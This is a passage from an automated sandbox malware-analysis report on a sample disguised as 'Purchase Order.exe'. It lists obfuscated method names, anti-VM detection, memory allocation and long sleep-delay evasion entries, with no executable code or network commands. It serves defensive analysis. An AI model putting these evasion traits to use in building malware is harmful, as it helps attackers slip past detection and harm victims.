            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, xIP7IyRvvhY4aieuRp.csHigh entropy of concatenated method names: 'ixxchxGPlm', 'S2HckqEuHx', 'ToString', 'HlNc7ges59', 'kPtcYnuTkM', 'ddHc9hEnA2', 'SxbcPuc3bB', 'B8Pcdf67GO', 'Tm5cbVtfXX', 'YUtcFVcZA9'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, pUZuqtnGEFgUxGMRtR.csHigh entropy of concatenated method names: 'UyAd1oZii3', 'UnXdZ6PPR8', 'QMDd3h47SW', 'j47dg37Sih', 'iXkd6hVqNt', 'nG8duMwKZO', 'fD8dDciuy0', 'LrCdsxut24', 'sQZBsFYjeGyvE6Ite9a', 'Xy8hNSYcKo1NsImgSfy'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, s4X4LuFEvtddWivXUm.csHigh entropy of concatenated method names: 'ikr9gMUsHu', 'CLh96OwPIM', 'lKu9TXC1kF', 'kDv9DYCeSs', 'WT09HU0mLv', 'Wto9S17Sjx', 'Ly29c6veP0', 'exU9UVIqUE', 'gDN9GGZSxy', 'o3d9QmDNdS'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, KoHwCn0VAavRpE54m8.csHigh entropy of concatenated method names: 'uCNbZYRVwf', 'IvSbx8ryjb', 'Frnb3DQPML', 'SPBbgRYCAm', 'l6Jbp5bHBp', 'Hagb60sbMx', 'hywbu0ogv5', 'QVebTbplEc', 'LKwbD2DEvE', 'xn2bs6G7dv'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, w3irh0dMbfWIaWLdDO.csHigh entropy of concatenated method names: 'wyVHWWPX6s', 'TMnHIykAdB', 'Rd5H2ogOCS', 'PVtHrQrgZv', 'CFRHjhDNeO', 'xt8HN9VfVc', 'DL6HoHDokw', 'x97HC0A7WL', 'gbfH8MGKip', 'R4DHVqp2Lo'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, KUgFQ4WTCrKXUfgMW7.csHigh entropy of concatenated method names: 'kQTPpnMGGn', 'fXxPu3yAfF', 'OuT9Nigg4u', 'dXB9oEKhTg', 'GE29CxjBeI', 'Jrh98YEdun', 'igi9VyBCKi', 'yu99J30pBl', 'csL9RUTTXU', 'uZf9WlCUa8'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, LkDy48btoEH441yn35.csHigh entropy of concatenated method names: 'GVhG4XPKcd', 'nC0GeyxxJY', 'mn9GBp0rSF', 'RQUG7whgj1', 'mO9GYB0DdR', 'MieGPI8ImV', 'v7pGdJlrTy', 'SvuUMro70m', 'WVCUEncf10', 'tS9UOFs5DM'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, WDV5NXzgCgmgNMVA8V.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xMLGwUZHZ6', 'MnkGHDeGWo', 'c1rGSEpvi6', 'T9WGckULIc', 'zgTGUp9F6X', 'EoEGGx5P2a', 'pSxGQTNYu8'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, ftWhWilFvs26U0HpnX.csHigh entropy of concatenated method names: 'gOwUv6Q1wo', 'UOvUj61hAC', 'p6CUNPcgji', 'gGjUoZu73Q', 'KkWU26mTB3', 'b7jUCRPWam', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, mpRvKO3JoGJC6tKJYH.csHigh entropy of concatenated method names: 'YHQY2Hy7uo', 'oDlYr4GyHe', 'TZFYi7p5BN', 'GDSYtIcSl1', 'GthYLBG39H', 'cOoYAaNEa4', 'egsYMT8LVo', 'CIrYEBdp2I', 'psbYO5YK91', 'xheYyrfKik'
            Source: C:\Users\user\Desktop\Purchase Order.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 1900000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 52A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 9550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: A550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 9550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597373Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596715Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595951Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595623Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeWindow / User API: threadDelayed 8718Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeWindow / User API: threadDelayed 1145Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6628Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -23058430092136925s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7012Thread sleep count: 8718 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7012Thread sleep count: 1145 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597373s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596715s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595951s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595623s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6968Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597373Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597156Jump to behavior
